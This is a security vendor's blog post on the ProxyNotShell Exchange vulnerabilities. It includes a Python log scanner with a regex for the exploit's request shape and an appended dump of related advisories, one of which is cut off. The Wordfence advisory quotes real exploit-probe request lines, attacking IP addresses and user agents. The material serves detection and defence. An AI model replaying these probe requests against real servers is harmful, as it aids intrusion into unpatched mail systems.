On September 29, Microsoft security researchers announced two new zero-day vulnerabilities, CVE-2022-41040 and CVE-2022-41082, affecting Microsoft Exchange Server. Used in tandem, the vulnerabilities allow remote code execution (RCE). It is important to note that both require authenticated access to the target server before exploitation. Trend Micro gave the two vulnerabilities severity ratings of 8.8 and 6.3 out of 10, respectively.
According to researchers, CVE-2022-41082 is closely related to the [ProxyShell](<https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9>) vulnerability from 2021, CVE-2021-34473. The request string disclosed for the recent exploit is identical to that of last year’s vulnerability, and the mitigation provided by Microsoft is the same as well.
Imperva Threat Research has recently observed considerable attacker activity targeting last year’s ProxyShell vulnerability (CVE-2021-34473). Threat Research rules and policies may also be picking up attacks targeting the new vulnerabilities (CVE-2022-41040 and CVE-2022-41082).
[GTSC](<https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>), the company that discovered these vulnerabilities in August, believes that a Chinese threat actor may be behind the attacks observed so far. Per GTSC, the attacks use Chinese character encoding and the China Chopper webshell for persistent remote access, a backdoor commonly used by likely state-sponsored Chinese hacking groups.
Given the existing blocking rules that mitigate the CVE-2021-34473 ProxyShell vulnerabilities, these new CVEs are mitigated out of the box by both Imperva Cloud WAF and WAF Gateway. Customers who wish to implement a manual mitigation based on Microsoft's advisory can find it [here](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). Microsoft noted that the CVEs only impact on-premises Exchange servers, so Exchange Online customers do not currently need to take any action.
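As an added example (not Imperva's, Microsoft's or GTSC's code), the following scanner walks constructed IIS W3C log lines and flags requests with the Autodiscover + '@' + PowerShell shape that the post describes as shared between ProxyShell and the new CVEs. The regex is this example's own, modeled on the shape of the URL Rewrite mitigation in Microsoft's guidance (an assumption), and every log line and IP address is constructed.

```python
import re
from typing import Dict, Iterator, List

# Request shape shared by ProxyShell (CVE-2021-34473) and ProxyNotShell
# (CVE-2022-41040 / CVE-2022-41082): the Autodiscover endpoint, an '@'
# (raw or URL-encoded as %40) in the request, and the PowerShell back end
# named after it. Modeled on the shape of the URL Rewrite mitigation in
# Microsoft's guidance; this regex is the example's own (an assumption),
# not a copy of Microsoft's rule or of Imperva's WAF signatures.
AUTODISCOVER_POWERSHELL = re.compile(
    r"autodiscover\.json.*(?:@|%40).*powershell", re.IGNORECASE
)

# Constructed IIS W3C log excerpt (not real traffic). The '#Fields:' line
# drives the column mapping, as it does in real IIS logs; spaces inside a
# field (e.g. the user agent) are written as '+' the way IIS logs them.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2022-09-30 10:01:02 10.0.0.5 GET /owa/auth/logon.aspx url=/owa/ 203.0.113.10 Mozilla/5.0+(Windows+NT+10.0) 200
2022-09-30 10:01:09 10.0.0.5 GET /autodiscover/autodiscover.json a%40example.test&Protocol=Powershell 203.0.113.77 curl/7.79.1 401
2022-09-30 10:01:15 10.0.0.5 POST /autodiscover/autodiscover.json x=@example.test&Protocol=powershell 203.0.113.77 Mozilla/5.0+(Macintosh) 200
2022-09-30 10:02:30 10.0.0.5 GET /autodiscover/autodiscover.json Email=user%40example.test&Protocol=EWS 198.51.100.4 Outlook/16.0 200
2022-09-30 10:03:00 10.0.0.5 POST /powershell/ - 198.51.100.4 Microsoft+WinRM+Client 200
"""


def parse_iis_log(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per request line, keyed by the most recent '#Fields:' header."""
    fields: List[str] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # the header can change mid-file; track the latest
            continue
        if line.startswith("#"):
            continue  # other directives such as #Software or #Date
        values = line.split(" ")
        if not fields or len(values) != len(fields):
            continue  # cannot map the columns safely; skip rather than guess
        yield dict(zip(fields, values))


def is_autodiscover_powershell_probe(entry: Dict[str, str]) -> bool:
    """True when path + query show the ProxyShell/ProxyNotShell request shape."""
    stem = entry.get("cs-uri-stem", "")
    query = entry.get("cs-uri-query", "-")
    target = stem if query == "-" else f"{stem}?{query}"  # IIS logs '-' for no query
    return AUTODISCOVER_POWERSHELL.search(target) is not None


def find_probes(text: str) -> List[Dict[str, str]]:
    """Return the log entries whose request matches the probe shape."""
    return [e for e in parse_iis_log(text) if is_autodiscover_powershell_probe(e)]


def probe_sources(text: str) -> Dict[str, int]:
    """Count matching requests per client IP, a first cut for triage and blocking."""
    counts: Dict[str, int] = {}
    for entry in find_probes(text):
        ip = entry.get("c-ip", "?")
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print(hit["date"], hit["time"], hit["c-ip"], hit["cs-method"],
              hit["cs-uri-stem"], hit["sc-status"])
    print(probe_sources(SAMPLE_LOG))
```

Because the post notes that exploitation needs authenticated access, matching lines with a 2xx status deserve the first look, while 401 matches show probing that did not get past authentication.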
As always, Imperva Threat Research continues to monitor the situation and will provide updates as new information emerges.
The post [Microsoft Exchange Server Vulnerabilities CVE-2022-41040 and CVE-2022-41082](<https://www.imperva.com/blog/microsoft-exchange-server-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) appeared first on [Blog](<https://www.imperva.com/blog>).
Published 2022-09-30 by Gabi Stapel. CVEs referenced: CVE-2021-34473, CVE-2022-41040, CVE-2022-41082.
{"checkpoint_advisories": [{"lastseen": "2022-10-04T15:20:24", "description": "A remote code execution vulnerability exists in Microsoft Exchange. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Exchange Server Remote Code Execution (CVE-2022-41082; CVE-2022-41040)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-04T00:00:00", "id": "CPAI-2022-0628", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-04T10:05:38", "description": "A remote code execution vulnerability exists in Microsoft Exchange. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Exchange Server Remote Code Execution (CVE-2021-34473; CVE-2021-34523)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-09-30T00:00:00", "id": "CPAI-2021-0476", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "msrc": [{"lastseen": "2023-06-03T15:13:34", "description": "November 8, 2022 update - Microsoft released security updates for CVE-2022-41040 and CVE-2022-41082. We recommend that customers protect their organizations by applying the updates immediately to affected systems. The options described in the Mitigations section are no longer recommended. For more information, review the Exchange Team blog. 
Summary Summary On November 8 Microsoft released security updates for two zero-day vulnerabilities affecting Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T07:00:00", "type": "msrc", "title": "Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T07:00:00", "id": "MSRC:644966B4D83B650C284EC9D93664582D", "href": "/blog/2022/09/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-11-08T18:46:25", "description": "November 8, 2022 update - Microsoft released security updates for CVE-2022-41040 and CVE-2022-41082. We recommend that customers protect their organizations by applying the updates immediately to affected systems. The options described in the Mitigations section are no longer recommended. For more information, review the Exchange Team blog. 
Summary On November 8 Microsoft released security updates \u2026\n\n[ Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server Read More \u00bb](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T06:55:00", "type": "msrc", "title": "Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T06:55:00", "id": "MSRC:4F7507AA26F4DEB78152DE764136012C", "href": "https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-11T21:15:42", "description": "November 8, 2022 update - Microsoft released security updates for CVE-2022-41040 and CVE-2022-41082. We recommend that customers protect their organizations by applying the updates immediately to affected systems. The options described in the Mitigations section are no longer recommended. For more information, review the Exchange Team blog. 
Summary Summary On November 8 Microsoft released security updates for two zero-day vulnerabilities affecting Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T07:00:00", "type": "msrc", "title": "Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T07:00:00", "id": "MSRC:87D7D0E827E89DC02EC00DFCF04D1B34", "href": "https://msrc.microsoft.com/blog/2022/09/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T15:35:29", "description": "Update August 25, 2021: Microsoft strongly recommends that you update your servers with the most recent security updates available. 
CVE-2021-34473 (ProxyShell) CVE-2021-34523 (ProxyShell) CVE-2021-33766 Today is Update Tuesday \u2013 our commitment to provide a predictable monthly schedule to release updates and provide the latest protection to our customers. Update Tuesday is a monthly cycle when Microsoft releases patches for vulnerabilities that we have found proactively or that have been disclosed to us through our security partnerships under a coordinated vulnerability disclosure.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "msrc", "title": "April 2021 Update Tuesday packages now available", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-04-13T07:00:00", "id": "MSRC:C28CD823FBB321014DB6D53A28DA0CD1", "href": "/blog/2021/04/april-2021-update-tuesday-packages-now-available/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-22T16:39:48", "description": "Update August 25, 2021: Microsoft strongly recommends that you update your servers with the most recent security updates 
available. CVE-2021-34473 (ProxyShell) CVE-2021-34523 (ProxyShell) CVE-2021-33766 Today is Update Tuesday \u2013 our commitment to provide a predictable monthly schedule to release updates and provide the latest protection to our customers. Update Tuesday is a monthly cycle when Microsoft releases patches for vulnerabilities that we have found proactively or that have been disclosed to us through our security partnerships under a coordinated vulnerability disclosure.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "msrc", "title": "April 2021 Update Tuesday packages now available", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-04-13T07:00:00", "id": "MSRC:8F98074A1D86F9B965ADC16597E286ED", "href": "https://msrc.microsoft.com/blog/2021/04/april-2021-update-tuesday-packages-now-available/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2022-10-03T13:58:18", "description": "Microsoft has released [Customer Guidance for Reported Zero-day Vulnerabilities in 
Microsoft Exchange Server](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). According to the blog post, \u201cMicrosoft is aware of limited targeted attacks using the two vulnerabilities to get into users\u2019 systems.\u201d The two vulnerabilities are CVE-2022-41040 and CVE-2022-41082, affecting on-premises Microsoft Exchange Server 2013, 2016, and 2019. **Note:** Microsoft Exchange Online is not affected. \n\nAn attacker could exploit these vulnerabilities to take control of an affected system.\n\nCISA encourages users and administrators to review the following information from Microsoft and apply the necessary mitigations until patches are made available:\n\n * [Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>)\n * [Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082](<https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>)\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/09/30/microsoft-releases-guidance-zero-day-vulnerabilities-microsoft>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", 
"version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T00:00:00", "type": "cisa", "title": "Microsoft Releases Guidance on Zero-Day Vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-01T00:00:00", "id": "CISA:8ED5E84007437E9B88D2418732B63E04", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/09/30/microsoft-releases-guidance-zero-day-vulnerabilities-microsoft", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-08-22T22:07:03", "description": "Malicious cyber actors are actively exploiting the following ProxyShell vulnerabilities: [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>), [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>), and [CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>). An attacker exploiting these vulnerabilities could execute arbitrary code on a vulnerable machine. CISA strongly urges organizations to identify vulnerable systems on their networks and immediately apply [Microsoft's Security Update from May 2021](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/11/microsoft-releases-may-2021-security-updates>)\u2014which remediates all three ProxyShell vulnerabilities\u2014to protect against these attacks. 
\n\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-21T00:00:00", "type": "cisa", "title": "Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-21T00:00:00", "id": "CISA:8C51810D4AACDCCDBF9D526B4C21660C", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "wordfence": [{"lastseen": "2022-10-19T17:09:20", "description": "The Wordfence Threat Intelligence team has been monitoring exploit attempts 
targeting two zero-day vulnerabilities in Microsoft Exchange Server tracked as CVE-2022-41040 and CVE-2022-41082, collectively known as ProxyNotShell. These vulnerabilities are actively being exploited in the wild. At the time of writing, we have observed 1,658,281 exploit attempts across our network of 4 million protected websites.\n\nGiven that a quick Shodan search shows 214,671 hosts running Exchange, this is not an insignificant vulnerability. Fortunately, tracking exploit attempts has been made easy due to the similarities to the ProxyShell vulnerability from 2021. From the time we began tracking ProxyNotShell, we have observed 3,543 IP addresses across 365 hosts sending requests that are attempting to probe for and exploit the vulnerabilities.\n\nFor more details on ProxyNotShell and the data we have collected, continue reading below or [download a PDF of this post here](<https://www.wordfence.com/wp-content/uploads/2022/10/Two-Weeks-of-Monitoring-ProxyNotShell-CVE-2022-41040-CVE-2022-41082-Threat-Activity-post.pdf>).\n\nThe following top 20 IP addresses are responsible for 313,011 of the tracked exploit attempts.\n\n * 91.245.255.98\n * 152.89.198.108\n * 199.47.92.216\n * 192.241.217.237\n * 192.241.217.39\n * 192.241.219.153\n * 192.241.219.69\n * 192.241.213.162\n * 192.241.219.73\n * 192.241.212.186\n * 192.241.216.62\n * 192.241.212.202\n * 192.241.216.14\n * 192.241.218.85\n * 192.241.215.205\n * 192.241.220.212\n * 192.241.202.142\n * 192.241.220.87\n * 192.241.218.123\n * 192.241.212.173\n\nLooking at the IP addresses being logged, it quickly becomes apparent that a large number of the IP addresses are part of the same CIDR range of 192.241.192.0/19. Nearly one-third of our logged requests probing and targeting this vulnerability come from these IP addresses, which are assigned to DigitalOcean. 
This means that DigitalOcean\u2019s ASN is hosting nearly 3 times as many IPs sending requests targeting this vulnerability compared to the next most active host.\n\nWhile DigitalOcean is a legitimate virtual and dedicated server provider with a high reputation, it is still the source of many of the requests we have tracked. Threat actors often look for affordable solutions to quickly spin up an attack campaign, and in this case it appears that at least one threat actor either chose to use DigitalOcean as their provider or purchased access to a number of compromised servers on their network.\n\nMany of the requests we have observed thus far utilize GET requests to discover if the target is a vulnerable Exchange server. The requests we are seeing follow a few basic variations ranging from a basic `GET /autodiscover/autodiscover.json?%40zdi%2FPowershell= HTTP/1.1` to more complex requests like `GET /autodiscover/autodiscover.json?a%40foo_var%2Fowa%2F=&Email=autodiscover%2Fautodiscover.json%3Fa%40foo.var&Protocol=XYZ&FooProtocol=Powershell HTTP/1.1`. The second request example is an early proof-of-concept that has been used widely since its public release. If this looks familiar, that\u2019s because it is the same as the ProxyShell vulnerability exploit.\n\nThe user-agent also has a number of variations, primarily one reused from the user-agent for Firefox 105 on Windows 10. 
The top ten user-agent strings can be seen here:\n\n * User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0\n * Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0\n * Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)\n * Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36\n * Fuzz Faster U Fool v1.5.0-dev\n * Amazon CloudFront\n * User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 X-Middleton/1\n * Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.17\n * curl/7.79.1\n * Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36\n\n\n\nThe top user-agent also appears with the most common request we are seeing, which can be seen in the request header below.\n\n`GET /autodiscover/autodiscover.json?a%40foo_var%2Fowa%2F=&Email=autodiscover%2Fautodiscover.json%3Fa%40foo.var&Protocol=XYZ&FooProtocol=Powershell HTTP/1.1` \n`Geoip-Addr: 91.245.255.98` \n`Connection: close` \n`Accept: */*` \n`Accept-Encoding: gzip, deflate` \n`User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0` \n`Host: <redacted>`\n\nWhile the above GET request has been observed in 224,794 requests, it is used with multiple variations of request headers, though there are some consistencies in the query string. 
All of the requests are GET requests, are probing /autodiscover/autodiscover.json, and use Powershell, which are requirements to exploit this vulnerability.\n\n`GET /autodiscover/autodiscover.json?a%40foo_var%2Fowa%2F=&Email=autodiscover%2Fautodiscover.json%3Fa%40foo.var&Protocol=XYZ&FooProtocol=Powershell HTTP/1.1` \n`User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0` \n`Accept: */*` \n`Accept-Encoding: gzip, deflate` \n`Connection: keep-alive` \n`Host: www.<redacted>.com`\n\nAs mentioned previously, the user-agent primarily being observed is Google Chrome on Windows 10, however despite that, we have observed a number of user-agent request headers that include MacOS user-agents, such as this header that includes an older user-agent for Firefox 76 on MacOS Mojave. In fact, this was the second-largest user-agent observed, with 35,811 requests logged.\n\n`GET /autodiscover/autodiscover.json@Powershell.dewd79hxlu.com/owa/www.google.com HTTP/1.1` \n`Accept-Encoding: gzip` \n`Connection: close` \n`Host: <redacted>:443` \n`Referer: https://<redacted>:443/autodiscover/autodiscover.json@Powershell.dewd79hxlu.com/owa/www.google.com` \n`User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0`\n\nWhile less common, we are also seeing more complicated GET requests as well as more distinctive user-agents. The following request shows an attempt to exploit the ProxyNotShell vulnerabilities on a university website, using an open-source web fuzzer known as Fuzz Faster U Fool, which we see reflected in the user-agent string. This is one example of a logged exploit attempt that could either be the university\u2019s security team probing for the vulnerability to ensure any security holes are closed, or a threat actor probing for vulnerabilities to exploit. 
However, as this request was aimed at the website and not an Exchange server, it is more likely that this was an attempt by a threat actor to identify a vulnerability for the purpose of exploiting it.\n\n`GET /autodiscover/autodiscover.json?aa%40mail_<redacted>_edu_v6_6ipl9gf1rbdde8jlvh33c0t1tszjnbb0_<redacted>_com%2Fowa%2F%3F=&Email=autodiscover%2Fautodiscover.json%3Fa%40mail.<redacted>.edu.v6.6ipl9gf1rbdde8jlvh33c0t1tszjnbb0.<redacted>.com&Protocol=Autodiscoverv1&mail_<redacted>_edu_v6_euctlor93jplqgvt7pfbo85950brzin7_<redacted>_com=&protocol=Powershell HTTP/1.1` \n`Accept-Encoding: gzip` \n`Host: mail.<redacted>.edu` \n`User-Agent: Fuzz Faster U Fool v1.5.0-dev` \n`X-Https: 1`\n\nAs with ProxyShell, the ProxyNotShell exploit used on a vulnerable Exchange server can lead to remote code execution (RCE) on the server. This could lead to full takeover of a vulnerable server. The good news is that unlike ProxyShell, ProxyNotShell requires the threat actor to be authenticated with a real email address in order to exploit the vulnerability.\n\nThe Wordfence Intelligence IP Threat Feed will show new IP addresses attacking CVE-2022-41040 and CVE-2022-41082 in the \u201crce\u201d category as the feed is updated every 60 minutes.\n\nThe post [Two 